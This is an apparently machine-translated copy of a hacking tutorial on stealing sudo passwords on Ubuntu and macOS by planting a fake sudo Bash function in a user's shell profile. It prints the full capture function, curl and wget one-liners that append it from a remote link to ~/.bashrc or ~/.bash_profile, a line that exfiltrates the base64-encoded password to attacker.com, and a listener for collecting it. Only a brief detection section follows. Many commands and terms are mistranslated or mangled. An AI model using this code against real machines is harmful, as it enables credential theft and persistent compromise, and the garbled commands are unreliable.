قالب وردپرس درنا توس
Home / Tips and Tricks / How to steal Ubuntu & MacOS Sudo passwords without any cracking «Zero Byte :: WonderHowTo

How to steal Ubuntu & MacOS Sudo passwords without any cracking «Zero Byte :: WonderHowTo



With a simple social trick, sudo passwords can be captured in seconds without the goal's knowledge. The passwords can then be saved in a file or exfiltered to another computer on the network.

After utilizing a system, penetration testers and hackers will often commit privilege escalation privileges. Such attacks include kernel exploitation and phishing passwords. The selected attack here takes a social technology method using Bash functions to mimic the function of the sudo command.

How Sudo Works

Let's use the following whoami and id commands as an example. If we go into whoami to a terminal, it will return the current user name.

  id  whoami  id  will return the user's uid  -u ), a unique identifier assigned to each user on the system. By default, in Debian and Ubuntu systems, an ordinary user (non-root users) is assigned 1000 of them (shown below). Similarly, a normal user is assigned to 50OS. 

  id -u 
  1000 

When [prefixwarmuptest sudo is raised and the specified command is executed with root (uid 0). This is all common and normal behavior for sudo and Unix systems.

  sudo id -u 
  0 

The command type can be used to identify how the supplied

  sudo 
  sudo is / usr / bin / sudo 

In this case interpreted sudo as / usr / bin / sudo. This is also standard behavior. When someone executes the [sudo [command] command (eg, [su] whoami ), they essentially do the following.

  / usr / bin / sudo / usr / bin / whoami 
 ] root 

Recommended book on Amazon: Sudo Mastery: User Access Control for Real People

How Basic Functions Work

The Way sudo (or any command for that matter) is interpreted can be changed in such a way that it is open to the user. Like Bash aliases, complex functions can be imported into the shell. Take the GIF example below.

We can see that it is possible to run an ordinary apt-get update command fails because "sudo" is no longer interpreted as a direct link to the real sudo binary. It is now a function that prints any arbitrary text. This can very easily be abused. The "Sudo" feature can behave exactly like the real sudo, while registering and exfoliating the target password.

You should already have remote access

This article assumes that remote access to the target system has been established. With macOS targets, this can be achieved with a non-detectable payload, USB fall attack or USB rubber ducky. Ubuntu and Debian servers can also be used with various SSH and server-based vulnerabilities.

Step 1: Creating a Malicious Basic Function

This type of abuse is better shown in the following function. Comments have been added to green to explain the weight of each row.

  function sudo () {
# A "real-time" variable is created. It calls the command `which` to locate
# path to the actual sudo binary. This is used later in the function to
# Execute the target desired command.
realsudo = "$ (which sudo)"

# The command `read` will lead (` -p ') the target with a convincing password
# inquiry. The argument `` inserts the entered password, just like the real one
# sudo command would. The target password is then set in "inputPasswd"
# variable.
read -s -p "[sudo] password for $ USER:" inputPasswd

# There are two `printf` commands here, separated by a semicolon.
# The first simply writes a new line in the terminal, like the real sudo
# makes. The other one writes the target user name and password to a
# The file is named "hackedPasswd.txt" in the / tmp directory.
printf "n"; printf% s "$ USER: $ inputPasswd"> /tmp/hackedPasswd.txt

# As an alternative to writing the password to / tmp directory,
# It can be exfiltered to the attacker server. The above below
# "encoded" and "curl" lines to enable this feature. password
# is encoded with `base64` to make it easier to send in the URL.
# encoded = $ (printf% s "$ inputPasswd" | base64)> / dev / null 2> & 1
# curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1

# The `-S & # 39; option allows users to enter their sudo password with the command
# line. This is used to run an arbitrary "exit" command (`-c`) as root
# user (`-u`) to unlock the sudo timeout function. This command and its
# output is hidden (/ dev / null) from the target. It's just here to allow
# sudo usage for upcoming commands.
# For more on sudo timeouts and / dev / null, see:
# https://itsfoss.com/change-sudo-password-timeout-ubuntu/
# https://stackoverflow.com/questions/10508843/what-is-dev-null-21
$ realsudo -S << < "$inputPasswd" -u root bash -c "exit" > / dev / null 2> & 1

# With sudo timeout engaged, privileged commands can run without
# prompts the user for a password. This line will perform the goal
# desired command.
$ realsudo "$ {@: 1}"
} 

Let's see how this feature looks to the goal.

As we can see, the target is still prompted with a password request when trying to install software. A closer look with type reveals the malicious function. The captured password is saved in the file /tmp/hackedPasswd.txt.

Option 1: Target Debian & Ubuntu Systems

With Debian and Ubuntu systems, when a new terminal or shell is opened, the file ~ / .bashrc is executed. This file (which can be modified by non-root users) usually defines useful attributes such as aliases, history boundaries, and color variables. It can also be abused to import malicious Bash features. This applies to Debian servers, Ubuntu desktops and macOS systems.

To facilitate, I have uploaded the harmful sudo function to my GitHub page. It can be downloaded on the target system with the command below.

  curl & # 39; https: //git.io/fhNWm&#39; >> ~ / .bashrc 

This will attach the ( >> ) sudo function to the bottom of the target's .bashrc file. From here, when the target logs into their server (eg SSH) and runs a sudo command, the logged in password is saved in the / tmp directory. Alternatively, if curl is not installed on the target system, wget can be used.

  https -O- & # 39; https: //git.io/fhNWm&#39; >> ~ / .bashrc 

Option 2: Target macOS Systems

This type of attack is less effective for MacOS users. Just because they are not so likely to open a terminal and execute elevated commands. MacOS users do not need the sudo command as often as VPS targets or Ubuntu desktop users. Yet I show how to set it up against a macOS target, as it can be helpful for some penetration testers to explore all possible ways to raise their back door.

Like ~ / .bashrc, macOS systems perform ~ / .bash__profile file when Terminal is opened. Malicious base functions can be stored in this file. Use the command below wget to import the function into the target Bash profile.

  https -O- & # 39; https: //git.io/fhNWm&#39; >> ~ / .bash_profile 

When the target opens Terminal and runs a sudo command, the password is stored in the / tmp directory. This is illustrated in the screenshot below.

Step 2: Filter out the password (Optional)

In addition to saving the password to the / tmp directory, it may be desirable to have the password sent to one another computer or server. A real PHP listener could be configured to gracefully intercept POST data containing the password.

I decided to take a somewhat unorthodox approach and have a quick and dirty solution. This method requires a simple Python3 server set on the attacker's Kali system. http server module ( -m ) creates a web server with port 80 .

  python3 -m http server 80 
  Serving HTTP on 0.0.0.0 port 80 ... 

There are commands for encoding and exfiltering passwords entered in the sudo function. It is disabled by default and need not be commented to activate it.

  encoded = $ (printf &% 39; "$ inputPasswd" | base64)> / dev / null 2> & 1;
curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1; 

The password is encoded with base64 to facilitate submitting the URL. Curl is used to silently ( -s ) make a GET request on the attack server located on the "attacker.com" domain. This domain should be changed to the attacker's local IP address (192.168.1.X) or VPS IP address. Errors and output generated by the curl command are forced to / dev / null with 2> & 1 redirect. This prevents the curl from accidentally reporting errors in the terminal if the attacker's server is unavailable for some reason.

The target user name and password are actually sent to the URL. Imagine making an inquiry to "http: //192.168.1.X/tokyoneon: sUp3R-S3cUre_P @ $$ w0000rD!." The inquiry would certainly fail, there is no such website. However, the encoded password would be stored in the attacker's error log. Below is an example of such an error.

  Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [27/Feb/2019 00:05:12] code 404, message The file was not found
127.0.0.1 - - [27/Feb/2019 00:05:12] "GET / user: c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == HTTP / 1.1" 404 - 

Echo echo the encoded password of base64 to decode ( -d ) it.

  echo & # 39; c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == & # 39; | base64-d 
  sUp3R-S3cUre_P @ $$ w0000rD! 

Protecting against Basic Function Abuse

Malicious Bash features can be difficult to detect. If there is an attacker on your system that modifies the ~ / .bashrc or ~ / .bash_profile file, you might have more trouble worrying about.

As we have learned before, the type command is an extremely useful tool. It can be used to print the specified commands to be interpreted. Commands like sudo should only call the appropriate binary or will sometimes appear as "hashed" in the session. All other conditions should be investigated.

  type sudo 
  sudo is / usr / bin / sudo 

It is also a good idea to manually inspect the ~ / .bashrc file. Hackers will often use this file to integrate persistent back doors into Unix systems (eg, try a new Netcat connection each time a terminal is opened). This can be done with nano or vim .

  nano ~ / .bashrc 

Final Thoughts

This type of social technology attack has many applications. For example, similar functions can be created for ssh and other remote administration protocols. It would be possible for an attacker to steal SSH references and pivot to other systems within the goal control. Similarly, a malicious function of the command su can be created. This command, such as sudo is designed to increase user rights and can be easily mimicked using simple Bash features.

If you had this article, follow me on Twitter @tokyoneon_ and GitHub to keep track of my current projects. For questions and concerns, leave a comment below or let me know on Twitter.

Don't miss: Use Cowrie SSH Honeypot to catch attacks on your network

Cover photo by Arian Darvishi / Unsplash; Screenshots of tokyoneon / null byte




Source link